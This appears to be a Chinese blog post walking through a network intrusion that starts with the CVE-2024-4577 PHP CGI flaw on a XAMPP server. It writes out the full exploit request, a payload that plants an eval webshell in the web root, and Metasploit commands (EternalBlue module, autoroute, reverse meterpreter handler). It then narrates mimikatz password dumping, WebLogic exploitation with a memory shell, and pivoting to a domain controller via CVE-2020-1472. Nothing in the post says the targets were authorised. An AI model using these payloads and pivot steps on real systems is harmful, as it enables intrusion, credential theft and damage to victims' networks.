通过CVE-2024-4577 PHP CGI 远程代码执行入口的一次渗透

最新推荐文章于 2024-07-09 11:09:08 发布
最新推荐文章于 2024-07-09 11:09:08 发布
阅读量1k 收藏 20
点赞数 13
文章标签: 网络安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Success696/article/details/139973434
版权

访问http://目标IP/dashboard/发现时是XAMPP搭建的web环境,利用最近刚爆出的**PHP远程代码执行(CVE-2024-4577)**漏洞进行攻击
在这里插入图片描述
POC-EXP

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1

<?php die("Te"."sT");?>

<?php file_put_contents('..\htdocs\xj.php', '<?php eval($_POST["pass"]);?>');?>

通过BP或者postman等工具构造数据包验证是否存在
在这里插入图片描述
使用exp上传木马,这里要注意文件上传的位置

*XAMPP的常用路径*

网站根目录的默认路径:xampp\htdocs

执行chdir命令发现当前位于 C:\xampp\php
在这里插入图片描述
所以文件上传位置应该为 …\htdocs\xj.php

<?php file_put_contents('..\htdocs\xj.php', '<?php eval($_POST["pass"]);?>');?>

访问
在这里插入图片描述
木马成功写入,使用webshell工具连接
在这里插入图片描述
这里为了后续操作,直接上传远控木马进行上线操作
在这里插入图片描述

由于是第三方中间件搭建的web环境,拿到一个高权限,暂时不用考虑提权

做个信息收集:

可以看到还有一个内网地址192.168.2.0网段,直接进行扫描,看看存活哪些主机

当前拿下的主机内网ip为192.168.2.140在这里插入图片描述
扫到一台主机192.168.2.128
在这里插入图片描述
信息收集发现开放了 445 永恒之蓝ms17010漏洞利用端口

验证是否存在ms17010漏洞
在这里插入图片描述
CS设置
在这里插入图片描述
msf设置
在这里插入图片描述
添加路由

run autoroute -p //查看当前路由表

run post/multi/manage/autoroute //添加当前路由表

利用

use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述
由于需要192.168.2.140作为反连接受shell主机,因为攻击目标处于内网,不能直接与我们攻击服务器进行通讯需要在192.168.2.140进行以下操作(设置一个接收shell)

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_http

set lhost 192.168.2.140

set lport 4444

exploit -j

在这里插入图片描述
成功拿下对应主机,为了后续方便,这里依旧将权限移交给CS
在这里插入图片描述
同样对端口和内网段存活主机进行一个探测

出现新目标
在这里插入图片描述
由于是win7系统,可以尝试抓明文密码,这里mimikatz抓取到了密码,尝试横向移动192.168.2.129
在这里插入图片描述
这里需要注意一个木马的正反向,如果是用反向,应该以192.168.2.140为反连IP,如果想要利用192,168.2.128攻击,只能使用正向bind木马攻击,因为192.168.2.128开启了防火墙,而192.168.2.129并未设置防火墙
在这里插入图片描述
成功拿下192.168.2.129主机

同样操作,进行信息收集,探测
在这里插入图片描述
出现192.168.3.0新网卡,进行端口,IP扫描存活主机
在这里插入图片描述

3.128是刚刚拿下的主机,所以3.133则是下一个目标
在这里插入图片描述
可以看到,192.168.3.133开放了7001端口,这个端口一般就是weblogic的默认端口,但由于搭建在内网,我们无法直接访问,但刚刚拿下的192.168.3.128这台主机是能够进行通讯的,我们将其作为跳板机,建立代理进行攻击
在这里插入图片描述
成功本地访问到目标内网服务,由于是weblogic,尝试一个Nday利用

存在
在这里插入图片描述
执行命令没问题
在这里插入图片描述
为了后续利用,还是想办法让他上线到远控工具,这里有web服务,进行文件上传较为简单,但需要知道一个网站目录,但我们已经可以执行命令,所以还是可以找到的

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

这里不清楚为什么不能,可能目录还是不对,所以换了一个方法,直接植入内存马
在这里插入图片描述

成功

传马上线,由于192.168.3.133有防火墙,采用反向到192.168.3.128
在这里插入图片描述

成功上线
在这里插入图片描述

新发现192.168.10.0
在这里插入图片描述

mimikatz抓取到了一个明文密码,再次尝试横向移动在这里插入图片描述

由于weblogic存在防火墙,使用正向攻击192.168.10.12 横向移动
在这里插入图片描述

在这里插入图片描述
探测,net group “domain controllers” /domain 发现该主机处于域内环境,定位域控,

mimikatz抓取明文密码未成功,高版本禁止了,尝试域控提权,ms14068,CVE-2021-42287,CVE-2022-26923均不行,只有CVE-2020-1472可以利用,但该漏洞会将域内环境直接破坏(由于第一次操作时重置了域控密码,导致域内环境被破坏,无法进行复现),实操尽量多注意,至此,全部拿下

Xiao3jin
关注
  • 13
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 599
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9339
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
【紧急警示】Locked勒索病毒利用最新PHP远程代码执行漏洞大规模批量勒索!文末附详细加固方案
2401_83062893的博客
06-12 1265
PHP是一门通用开源脚本语言,其语法借鉴吸收C、Java和Perl等流行计算机语言的特点,因此利于学习,使用广泛,主要适用于Web开发领域。XAMPP是最流行的PHP开发环境,XAMPP是完全免费且易于安装的Apache发行版,其中包含MariaDB、PHP和Perl。XAMPP开放源码包的设置让安装和使用出奇容易,它以其广泛的应用范围在本地开发和测试领域备受赞誉。官网地址:https://www.apachefriends.org/zh_cn/index.html。
Nginx 解析漏洞 漏洞复现
鸥鹭忘机
10-04 2973
前言 该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 环境搭建 漏洞环境使用vulhub搭建,漏洞目录为 vulhub/nginx/nginx_parsing_vulnerability 在漏洞目录中执行以下命令即可构建漏洞环境。 docker-compose up -d 原理分析 首先来看不当配置: # php.ini cgi.fix_pathinfo=1 # php-fpm.conf security.limit_extensions为空 我们首先来看看cgi.fix_path
测试渗透前置知识-行业术语
TianYao
02-10 3894
测试渗透前置知识-行业术语1.肉鸡3.远控4.黑页5.挂马6.大马7.小马8.一句话后门9.后门10.拖库11.社工库12.撞库13.提权14.网络钓鱼15.社会工程学攻击16.rootkit17.IPC$18.弱口令19.默认共享20.shell21.交互式shell22.webshell23.溢出24.注入25.注入点26.旁站入侵27.C段渗透28.内网:29.外网30.中间人攻击31.端口32.免杀33.加壳34.花指令35.TCP/IP36.蜜罐37.拒绝服务攻击38.CC攻击39.脚本注入攻击(
记一次Vulnhub靶机练习成功拿下root权限
https://www.yuque.com/onlyxiu-123com
07-18 848
1、首先使用sudoarp-scan-l命令对局域网内的主机进行扫描,并推断出该目标ip地址!2、接着使用nmap,对该主机进行端口扫描nmap-sV-A192.168.1.15,就发现该主机开启了22,80端口以及版本号的相关信息。到这我们就会产生两个思路,爆破ssh或从80端口下手,寻找该网址是否有入口点,但ssh用户名都没有,无疑这是很大的工作量,所以我们就从80端口入手。!对该网址进行后台目录的扫描,经过测试发现页面存在信息,但依旧对我们渗透毫无帮助。!......
漏洞介绍及修复建议(漏洞汇总,建议收藏后期会不断更新)
baimao__Ch的博客
05-22 488
未分类Host 头攻击(高危)域名访问限制不严格(高危)URL 重定向(中危)会话劫持漏洞(中危)会话固定漏洞(中危)DNS 域传送漏洞(中危)检测到网站被黑痕迹(高危)传输层保护不足漏洞(中危)服务器启用了 TRACE Method 方法 (中危)点击劫持漏洞(X-Frame-Options 头缺失)(中危)启用了不安全的 HTTP 方法(启用了 OPTIONS 方法)(中危)Tomcat 版本过低漏洞 (中危)Apache Tomcat 示例目录漏洞 (中危)
信息安全专业生产实习-网络渗透测试实践
hello.尘心
09-09 1656
网络渗透测试实践 1. 实习的目的及任务 1.1 实习的目的 生产实习是实现理论知识和实践相结合的重要环节。通过实习,学生将对于课堂学习的基础和专业理论知识有更深入的掌握。特别是对信息安全技术与工程的最新发展和应用有较深入的了解。同时通过生产实习,进一步锻炼学生理论与实践相结合的能力,提高学习的主动性,为毕业后的社会工作打下良好的基础。、 1.2 实习任务要求 1.严格遵守企业各项规章制度,学生以真实...
【安全】Web渗透测试(全流程)
热门推荐
qqchaozai的专栏
10-29 9万+
1 信息收集 1.1域名、IP、端口 域名信息查询:信息可用于后续渗透 IP信息查询:确认域名对应IP,确认IP是否真实,确认通信是否正常 端口信息查询:NMap扫描,确认开放端口 如果不会用Nmap,看这里:NMAP 基础教程(功能介绍,安装,使用) 发现:一共开放两个端口,80为web访问端口,3389为windows远程登陆端口,嘿嘿嘿,试一下 发现:是Window...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8329
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全测评技术与标准
weixin_48579910的博客
07-06 909
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
中职网络安全B模块Cenots6.8数据库
最新发布
网络安全技术分享
07-09 554
密码:root), 进入 mysql 数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的 用户,将该用户的用户名作为 flag 提交;密码:root), 进入 mysql 数据库,改变默认 mysql 管理员的名称,将系统的默认管理员 root 改为 admin,防止被列举,将操作命令作为 flag 提交。密码:root), 进入 mysql 数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的 用户,使用 drop 命令将该用户删除,将操作命令作为 flag 提交。
中职网络安全Server2216
网络安全技术分享
07-09 492
黑客通过网络攻入本地服务器,通过特殊手段在系统中建立了多个异常进程,将恶意脚本的源文件所在的绝对路径作为Flag值提交;黑客在服务器某处存放了多个木马程序,请你找到此木马程序并清除木马,将木马建立连接所使用的端口号作为。只显示文件头和文件尾,因为文件头记录了开始,文件尾部记录了结束的最后一次攻击,所以筛选头和尾。黑客攻入本地服务器,请你找出黑客成功暴力破解服务器的具体时间,将暴力破解的时间范围作为。通过题目寻找异常脚本,脚本一般需要定时执行权限,所以进入定时任务目录查看定时任务。
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值